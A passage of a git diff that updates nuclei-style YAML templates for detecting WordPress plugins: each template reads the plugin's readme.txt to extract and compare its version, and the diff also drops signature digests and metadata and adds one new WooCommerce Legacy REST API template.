sticky-header-effects-for-elementor + wpscan: https://wpscan.com/plugin/sticky-header-effects-for-elementor + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/sticky-header-effects-for-elementor/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 406c7e3ae9..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdef50d36b5e2f666543ed4277ee521cb44e33a515b5ee007db68315ab900e92022100dd48407b899ca558ca493ebf9d94fca9ba9b04ecd8ad07a19658fd3782d3661f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f341f5e8ae..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039ed08050cc4865af998b5bb9ae3ad1077d6de1900e0634f41c8545def5db06a022100d93599c232eb5e9fc5b32a467d31eb379d814bda14727594bf266ed401ac2426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 6ede149b0d..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022060197a76b706aaad0b2239972ca9878408cd406a3ea13d2452cfce07d28abf66022013849354c14aee1f772ae288b7bb1022bd2a24289a600336b9f59c6761ac6f43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6c6a0a79ae..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea6d40e7439350af059e6946ef246c8734ea7f0c9ab208345a866e494c879cd702203ae3a50c864689eea037f8aeeb9ed1b79e469848351ff276f927b292b2f9bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index a3554a11af..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c349531272855d91aa09b81e7a53147b43d774b664db2bc818bab4ec19a96393022100a99fa46c51bff252dde3229021dd8de73646c43b680d6f42601aa6d9bf2bb0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 9bf8ac4b96..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033a02973a5f6f5e850de72da3e6dc3170ba36667d2cb8007f6e52ceb09d6330c02204159f07e7cd135eaafe4fe572c3074ee85d78d3520726c198b676b84abaf12d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 07cc9cc4da..9d77ce9155 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/templately/ metadata: - max-request: 1 plugin_namespace: templately wpscan: https://wpscan.com/plugin/templately tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/templately/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8911f369bcf27a136526a256422797170f4e13b731a0af4ca8c6e711ade6b0802206c84a945ff2cd945e14318308560b0de6686a2ff7ef1633e5edc7509d9d347f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index be13d883cb..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220484436a67435c851f304fa221f382d707741811a19ef2c89c3d53b5a429f40ee022100d34fa3d3afe830d6603bb8f5c5ec7646fc43f9f6e79d57f1ebff480e11de944c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 9b65e7c1d5..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008bc05bc984da1578bcbf32dcf039621db464f1e3f9f46d34acca4547e8b88ebd02203d5a0f7d208ee491a1a4ba4573cc8b4138535df52bcca5f495711fa46ed48fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 3470ee23f7..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf4dbccd89edd62a1fb8c257f3d24e62bd71bd6545b431a5b7c33c4fd151333d02202bc05dcdf461586f673e3e2058858a268ec351cec31a9d56e31db4f78029d5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index e0f7cca821..34d36d4349 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f55879abf19d6e3c6c0182386dd6092fb9684fd7db07e8fb1990feac11471085022100d9969ca7cb43ee3c8098f326aa43058808dcadd22005686572375497fcd76a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 2cd5b750c2..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c8a121f18a8ce093a054b2331c667452378de8a0c21a4ccd102931c142781d2022100a3d9dcfcb88b83732fb8ca8e75e1728274f2c464606c6e15956c7fe3ad5028b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index a9cde314fe..39b176dcb8 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab81da827643da5c7fa569c164e243bf4302a9860bb34988418547a731fc16a0022041e3cf23b804c735a94ce062eb65113eb51418912fb28d8079306095a6d206d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 1597550909..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075600a1c841e8a099311cd08aa74716c7ac657059138e1099c7309b805c67a0c02201f97ea43b7a6d454467d8649dcad40df41ce686249e1b95b499f7659a11ff2a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 53fd4ba2bc..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041f6fe50695c07e2eb191b75ea573cd755f9fe2e7f1b754c5161c50954802c7a02207f3914278b8f78ba4b589cc36abd6d534889ffcaffc214e7038fbd7b8adf5084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index c822166886..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd0ea127a728bda4306674b35e8a91e6f121e64240d195d7ff5c87ac279fd393022100be9746203bb46721f900409d9c134de938b48450d79e89b84d5075a2e07eb6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e1b5f55e51..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d2a72dcc159b468fe636ff41c5103126310ebe2184a1bcf6a67195f1f794ae502203ce24427a3755fc71fc52ea52d195e0cca7dcb104bab1bf6f21d87342e8c7c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index b2a877dbf6..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c99d197669275cd70818b6eb22090a6b0f57171599a8f24af31643cba2ebcc85022100b8261299f2e09d10128973d75d5c3d346fa6ac7dd8b758a7ab3e5d672f48ca3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 24e463a5dc..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c9fd62ec665626dc73d554db4b4ca80cbf5f618be136d002c3f27fe9f47e4e89022062b39db55bfb2a893a5af0b9f54ef25a40b09e391851f7b8c6bdf3a7d873adb7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 463df40300..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6ae92745adcab1a20772c8ad782eb97afd5ab1ae06709a348390815a4c43c2c022100dce3740582c0aa333e742ce1618b48afd856392aa2be5c4ca84f5a7bfadc2262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index ca6ee700d0..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0fbb92eae1fa2dd6d72405156f2e38454742e27c7e083a0b3e63434f32404090220039f749d1acbe988908be732fb9cf825222e146eacd0a6e1312aa9f04a3db1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 5b6ed128d9..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047d8f578f3e4bb7e1d73f27e27b12c1156bb2bda7e6402ff580723441c80b0be022100a6c3e808b95b4e688b3e80ec5821912d82511ff6856b1db2de32388a7a7d08d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml new file mode 100644 index 0000000000..a4c9f2c7c4 --- /dev/null +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -0,0 +1,49 @@ +id: wordpress-woocommerce-legacy-rest-api + +info: + name: WooCommerce Legacy REST API Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-legacy-rest-api/ + metadata: + plugin_namespace: woocommerce-legacy-rest-api + wpscan: https://wpscan.com/plugin/woocommerce-legacy-rest-api + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-legacy-rest-api/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1cba0d8a8b..1fd49d2e08 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -1,19 +1,19 @@ id: wordpress-woocommerce-payments info: - name: WooPayments – Fully Integrated Solution Built and Supported by Woo Detection + name: WooPayments' Integrated WooCommerce Payments Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092892fdb448eb9419c2955192143b11d7f6bef045303cd1d0ab5186ef9b8a07f02201b713494f92caf06e2aedad4e852ad543778e5868f179a3a33415212c6f22ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index dba89a9977..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bef932df72947d8fac736a0d9b3aafc6691096552363a7e1f736dc9ca49c2be8022100801d7d354a770eb417825dfaec21597326879afd22222cc02e1ec6efb7e9fd2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 6e9061223d..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a2b5a998ac7abceb3c89e7dfd7f8309b0fa1572869a7a5dfd92711bcf4f9f36022065c99809799d55e76081e3553cefdaf4166a6420b4267e22b7524419618edfb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fa2c136593..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a48f339a846dcddf84bf2e632cd1d0fbfa37a704122f63f0c9c78dc2831a1d702200a54e1a06467adbde2188d0422b6d471f7760365c15e8375a70367d8c4ff0bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 1015bdb48b..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011876a1a378c541ffd5723f70a5040432e728c2b93266d477a4123b778c8b713022100ccb8dc430692126473043e32088ae5935cd7e5a570ab59cc21fc5d7449122b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index e74f099d73..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 